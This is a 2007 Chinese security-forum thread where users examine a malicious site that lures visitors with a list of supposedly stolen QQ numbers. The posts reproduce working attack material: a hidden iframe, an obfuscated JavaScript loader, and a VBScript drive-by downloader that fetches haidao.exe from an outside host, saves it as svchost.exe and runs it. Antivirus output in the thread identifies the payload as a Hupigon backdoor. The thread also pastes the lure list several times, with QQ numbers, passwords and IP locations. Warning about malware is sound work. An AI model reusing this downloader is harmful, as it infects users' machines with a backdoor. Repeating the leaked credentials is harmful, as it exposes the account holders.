毒网之恶意脚本..快来踩呀...

xpn282

http://hdzi1.3j2.net/qq.txt

咖啡报了一个恶意脚本...

[ 本帖最后由 xpn282 于 2007-3-18 13:53 编辑 ]

The EQs

号码：310930843 密码：4187557570 地理位置：[222.83.192.106]广西北海市电信ADsl 号码：978807 密码：woaini1314 地理位置 号码：314220198 密码：yy02481846972 地理位置：[221.202.202.33]辽宁省营口市网通ADSL 号码： 密码：115214 地理位置：[221.202.202.33]辽宁省营口市网通ADSL 号码：403805794 密码：xiaoxiao 地理位置：[124.117.65.239]APNIC 号码：491088996 密码：cz880628 地理位置：号码：252720837 密码：wh42911800 地理位置：[61.186.167.216]重庆合川市电信 号码：491088996 密码：cz880628 地理位置：广西北海市电信ADSL 号码：25272117 密码：wuu42911800 地理位置：[60.188.167.216] 号码：310930843 密码：4187557570 地理位置：[222.83.192.106]广西北海市电信ADsl 号码：978807 密码：woaini1314 地理位置 号码：314220198 密码：yy02481846972 地理位置：[221.202.202.33]辽宁省营口市网通ADSL 号码： 密码：115214 地理位置：[221.202.202.33]辽宁省营口市网通ADSL 号码：403805794 密码：xiaoxiao 地理位置：[124.117.65.239]APNIC 号码：491088996 密码：cz880628 地理位置：号码：252720837 密码：wh42911800 地理位置：[61.186.167.216]重庆合川市电信 号码：491088996 密码：cz880628 地理位置：广西北海市电信ADSL 号码：25272117 密码：wuu42911800 地理位置：[60.188.167.216] 号码：310930843 密码：4187557570 地理位置：[222.83.192.106]广西北海市电信ADsl 号码：978807 密码：woaini1314 地理位置 号码：314220198 密码：yy02481846972 地理位置：[221.202.202.33]辽宁省营口市网通ADSL 号码： 密码：115214 地理位置：[221.202.202.33]辽宁省营口市网通ADSL 号码：403805794 密码：xiaoxiao 地理位置：[124.117.65.239]APNIC 号码：491088996 密码：cz880628 地理位置：号码：252720837 密码：wh42911800 地理位置：[61.186.167.216]重庆合川市电信 号码：491088996 密码：cz880628 地理位置：广西北海市电信ADSL 号码：25272117 密码：wuu42911800 地理位置：[60.188.167.216] 号码：310930843 密码：4187557570 地理位置：[222.83.192.106]广西北海市电信ADsl 号码：978807 密码：woaini1314 地理位置 号码：314220198 密码：yy02481846972 地理位置：[221.202.202.33]辽宁省营口市网通ADSL 号码： 密码：115214 地理位置：[221.202.202.33]辽宁省营口市网通ADSL 号码：403805794 密码：xiaoxiao 地理位置：[124.117.65.239]APNIC 号码：491088996 密码：cz880628 地理位置：号码：252720837 密码：wh42911800 地理位置：[61.186.167.216]重庆合川市电信 号码：491088996 密码：cz880628 地理位置：广西北海市电信ADSL 号码：25272117 密码：wuu42911800 地理位置：[60.188.167.216] 号码：310930843 密码：4187557570 地理位置：[222.83.192.106]广西北海市电信ADsl 号码：978807 密码：woaini1314 地理位置 号码：314220198 密码：yy02481846972 地理位置：[221.202.202.33]辽宁省营口市网通ADSL 号码： 密码：115214 地理位置：[221.202.202.33]辽宁省营口市网通ADSL 号码：403805794 密码：xiaoxiao 地理位置：[124.117.65.239]APNIC 号码：491088996 密码：cz880628 地理位置：号码：252720837 密码：wh42911800 地理位置：[61.186.167.216]重庆合川市电信 号码：491088996 密码：cz880628 地理位置：广西北海市电信ADSL 号码：25272117 密码：wuu42911800 地理位置：[60.188.167.216]

sdbsky

被插入：
http://hdzi1.3j2.net/qianli2.htm

htm下载鸽子



http://hdzi1.3j2.net/haidao.exe

8632002

楼上正解
原题目是
http://hdzi1.3j2.net/qq.txt利用腾讯漏洞获得的 6 7 8位qq

<iframe frameborder=0 src="http://hdzi1.3j2.net/qianli2.htm" width=0 height=0 scrolling=no></iframe>
<html><SCRIPT LANGUAGE="JAVASCRIPT"><!--
eval (unescape("%66%75%6E%63%74%69%6F%6E%20%65%5F%65%28%65%29%7B%65%3D%75%6E%65%73%63%61%70%65%28%65%29%3B%70%3D%22%4F%43%47%58%44%47%4F%57%4E%41%55%51%57%57%46%58%42%46%4E%54%49%56%48%45%59%22%3B%73%3D%22%22%3B%73%6C%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%6B%3D%30%2C%6A%3D%30%3B%66%6F%72%28%69%3D%30%3B%69%3C%65%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%7B%63%3D%65%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%3B%69%66%28%63%3C%31%32%38%29%7B%63%3D%63%5E%70%2E%63%68%61%72%43%6F%64%65%41%74%28%6A%25%70%2E%6C%65%6E%67%74%68%29%3B%6A%2B%2B%3B%7D%73%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%29%3B%69%66%28%73%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%73%6C%5B%6B%2B%2B%5D%3D%73%3B%73%3D%22%22%7D%7D%73%3D%73%6C%2E%6A%6F%69%6E%28%22%22%29%2B%73%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%73%29%7D"));//--></SCRIPT>
<body>
<SCRIPT LANGUAGE="JavaScript"><!--
e_e("s0%24*%2D7%3Bw%3A8%254ju2%3D%3A2a%3E%3A5%3A%2C%29%3BayR%222!4%3A%28%3A?w%3E%2816ff%7Di%2DB!6%2C6*%3D*3a %3C%28!4%7Fuz%3B%27%28%3A1%3Bht#6!7g%3B%2B%2B %25s305iki%3E%2D%28%3Aju5%2D%2B%2D*1yzm|2%5D9%28%3B58 h7%2C*!5%2Dvue0!*3cN%7B%60%24%2D3%3C!#i");//--></SCRIPT>
<SCRIPT LANGUAGE="JavaScript"><!--
e_e("s0%24*%2D7%3Bw%22 %3B6%226!%3D%7Fd5%3A%2C%29%3BayR%2B%29o2%3C3%3A#w%25#%2B7%2B%2Bt%27301SEcgxd3%2C%24%2F%270qjwd062%3Enfy !#&rik%2Eua9%2B5z96%3E%229%2Dh%2B%2C%2CtB?hra%28zN%3D%7Djl#w%5B%2Dd%7Bz%28dD%2E%7Dkj %7BE9ref%24m%5D4whs#uL5s%7B4eo%2Czc#|e%3Dlb%3Dzq4w_%3Cejd%3B%2E%27%3D%27 2jO4|~e%3B%284&3thasmtkxaeethsja|tz~qacj%7B%7Dbk%5C%25qdm%2E%3B6%28%3C8%285%7B        l%5E%24cug%0A%27&%2B4j?%27%22%2860#%3E%296%60L#btt&%2B&331* a%27%2D0%2E%242%3D%2F        %2C%3E%2C5%3CgS%3C6%25x0%24%3C6%28%24d4%2F2n5wjm%60%5C%3B %2Do%22xyg4%60%22%2746##7 %2C%2B7%3D~%25pumanR #ru!10?u%5D%3Dl&1%25%3A%0D%3D%3C%2C63%3Ddv%7B%7Dt&%22bdC3&!y%3C6%25R%22%3Bw%22ulw3%29%3B7%2B%2B%3A%3Dx%2B7%3C%2E7%22%28%22%222 5%7D%3Cf~L%00!h%3D1%3D%3C1%2B&!2%2C!g%22eba8b%5D%2Fe%2FrD%2C%22h%3Do~g%00%27i%25%2B !45%2C%3D!2f zjgpE%22vef%2B8*#%7B%22#%25#9%2FdD5|k%29t%7F%2Eqa9wa%2EcD2l6bL%2B%272n%28vue
%2Cm%24*!&%3B2!#?44#n%00%25jlv%60%5C%24w%3B%3A7%3DdzofD%3Dlu%60L0g8 7o%2Ftd3%2C%24%2F%270%7Dw%2741#D%2Dx 7%2BIaye%3C!%2D%29%3A%22#y# %27dD%27%2C%22h%3Bo~g%00%27i%2C%25%2B !485%2C%3D!2f9%7FzjgpE0%22%2Cd*wsa%0D3y#%2C6%2B7 7%246#%27%22*luf%5D%3D47q#459%24#|113%60%3Cc~qNvjn7%7F%22%2F4&%2F !~ uznR!%29%2Bw%3D47%5B6h72# %5Enug
%2Em%2D%2D%2B%2B%2F5%3Dy6j%00zol%5Eaug
%2Dm%2D%2D%2B%2B%2F5%3Dy5j%00uol%5E%60ug
%2Cm%2D%2D%2B%2B%2F5%3Dy3j%00tol%5Ecug
%2Bm%2D%2D%2B%2B%2F5%3Dy1j%00wol%5Ebug
*m%2D%2D%2B%2B%2F5%3Dy0j%00vol%5Eeug
%29m%2D%2D%2B%2B%2F5%3Dy?j%00vol%5Edug
%28m%2D%2D%2B%2B%2F5%3Dy%3Ej%00qol%5Egug
%27m%2D%2D%2B%2B%2F5%3Dy0j%00sol%5Efug
&m%2D%2D%2B%2B%2F5%3Dy%3Cj%00rol%5E*7%24%29y%3B 49%22%22%7D26%24%7D        2%7BakL5g!%3A%2C%2D*c%3Cj5*%24%3E%2E%3B%222%29%3C%3BL5g%25%293%3C%3B%2C!1%28%22owmg%5B6h%3B%2E%29%3D1C5%29%295o7%24%2B%25!*f%2B90y%3Abj%00%7BoDhf%25%2B70?7y");//--></SCRIPT>

jimmyleo

--> 123.exe
      [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Hupigon.bhi Backdoor server programs

黑衣~魂

haidao.exe咖啡報BackDoor-AWQ.b

greysign

<script language="VBScript">
on error resume next

    tcsafe = "http://hdzi1.3j2.net/haidao.exe"
z1="o"
z2="b"
z3="j"
z4="e"
z5="c"
z6="t"
m1=z1&z2&z3&z4&z5&z6
m2="classid"
m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
m4="Microsoft.XMLHTTP"
m5="Shell.Application"
m6="Scripting.FileSystemObject"
sub tcsafe1exe(m5,X9)
set Xe = Xc.createobject(m5,"")
dd="open"
Xe.ShellExecute X9,BBS,BBS,dd,0
end sub
Set Xc = document.createElement(m1)
Xc.setAttribute m2, m3
Xi=m4
Set Xd = Xc.CreateObject(Xi,"")
a1="Adodb.stream"
a5=a1&a2&a3&a4
Xg=a5
set Xa = Xc.createobject(Xg,"")
Xa.type = 1
Xh="GET"
Xd.Open Xh, tcsafe, False
Xd.Send
X9="svchost.exe"
set Xb = Xc.createobject(m6,"")
set Xe = Xb.GetSpecialFolder(2)
sub tcsafe2exe(Xe,X9)
X9= Xb.BuildPath(Xe,X9)
end sub
Xa.open
X8="Xa.BuildPath(Xa,X8)"
X7="Xb.BuildPath(Xb,X7)"
X6="Xc.BuildPath(Xd,X6)"
X5="Xd.BuildPath(Xf,X5)"
X4="Xe.BuildPath(Xg,X4)"
X3="Xf.BuildPath(Xh,X4)"
X2="Xg.BuildPath(Xi,X3)"
X1="Xh.BuildPath(Xg,X1)"
X0="Xi.BuildPath(Xk,X0)"
call tcsafe2exe(Xe,X9)
Xa.write Xd.responseBody
Xa.savetofile X9,2
Xa.close
call tcsafe1exe(m5,X9)
</script>

龙井茶

EQ2，你发那些东西出来不好哦。

秋叶濛濛

灰鸽子....

bridgewr

号码：310930843 密码：4187557570 地理位置：[222.83.192.106]广西北海市电信ADsl 号码：978807 密码：woaini1314 地理位置 号码：314220198 密码：yy02481846972 地理位置：[221.202.202.33]辽宁省营口市网通ADSL 号码： 密码：115214 地理位置：[221.202.202.33]辽宁省营口市网通ADSL 号码：403805794 密码：xiaoxiao 地理位置：[124.117.65.239]APNIC 号码：491088996 密码：cz880628 地理位置：号码：252720837 密码：wh42911800 地理位置：[61.186.167.216]重庆合川市电信 号码：491088996 密码：cz880628 地理位置：广西北海市电信ADSL 号码：25272117 密码：wuu42911800 地理位置：[60.188.167.216] 号码：310930843 密码：4187557570 地理位置：[222.83.192.106]广西北海市电信ADsl 号码：978807 密码：woaini1314 地理位置 号码：314220198 密码：yy02481846972 地理位置：[221.202.202.33]辽宁省营口市网通ADSL 号码： 密码：115214 地理位置：[221.202.202.33]辽宁省营口市网通ADSL 号码：403805794 密码：xiaoxiao 地理位置：[124.117.65.239]APNIC 号码：491088996 密码：cz880628 地理位置：号码：252720837 密码：wh42911800 地理位置：[61.186.167.216]重庆合川市电信 号码：491088996 密码：cz880628 地理位置：广西北海市电信ADSL 号码：25272117 密码：wuu42911800 地理位置：[60.188.167.216] 号码：310930843 密码：4187557570 地理位置：[222.83.192.106]广西北海市电信ADsl 号码：978807 密码：woaini1314 地理位置 号码：314220198 密码：yy02481846972 地理位置：[221.202.202.33]辽宁省营口市网通ADSL 号码： 密码：115214 地理位置：[221.202.202.33]辽宁省营口市网通ADSL 号码：403805794 密码：xiaoxiao 地理位置：[124.117.65.239]APNIC 号码：491088996 密码：cz880628 地理位置：号码：252720837 密码：wh42911800 地理位置：[61.186.167.216]重庆合川市电信 号码：491088996 密码：cz880628 地理位置：广西北海市电信ADSL 号码：25272117 密码：wuu42911800 地理位置：[60.188.167.216] 号码：310930843 密码：4187557570 地理位置：[222.83.192.106]广西北海市电信ADsl 号码：978807 密码：woaini1314 地理位置 号码：314220198 密码：yy02481846972 地理位置：[221.202.202.33]辽宁省营口市网通ADSL 号码： 密码：115214 地理位置：[221.202.202.33]辽宁省营口市网通ADSL 号码：403805794 密码：xiaoxiao 地理位置：[124.117.65.239]APNIC 号码：491088996 密码：cz880628 地理位置：号码：252720837 密码：wh42911800 地理位置：[61.186.167.216]重庆合川市电信 号码：491088996 密码：cz880628 地理位置：广西北海市电信ADSL 号码：25272117 密码：wuu42911800 地理位置：[60.188.167.216] 号码：310930843 密码：4187557570 地理位置：[222.83.192.106]广西北海市电信ADsl 号码：978807 密码：woaini1314 地理位置 号码：314220198 密码：yy02481846972 地理位置：[221.202.202.33]辽宁省营口市网通ADSL 号码： 密码：115214 地理位置：[221.202.202.33]辽宁省营口市网通ADSL 号码：403805794 密码：xiaoxiao 地理位置：[124.117.65.239]APNIC 号码：491088996 密码：cz880628 地理位置：号码：252720837 密码：wh42911800 地理位置：[61.186.167.216]重庆合川市电信 号码：491088996 密码：cz880628 地理位置：广西北海市电信ADSL 号码：25272117 密码：wuu42911800 地理位置：[60.188.167.216]


这也叫恶意脚本？？？？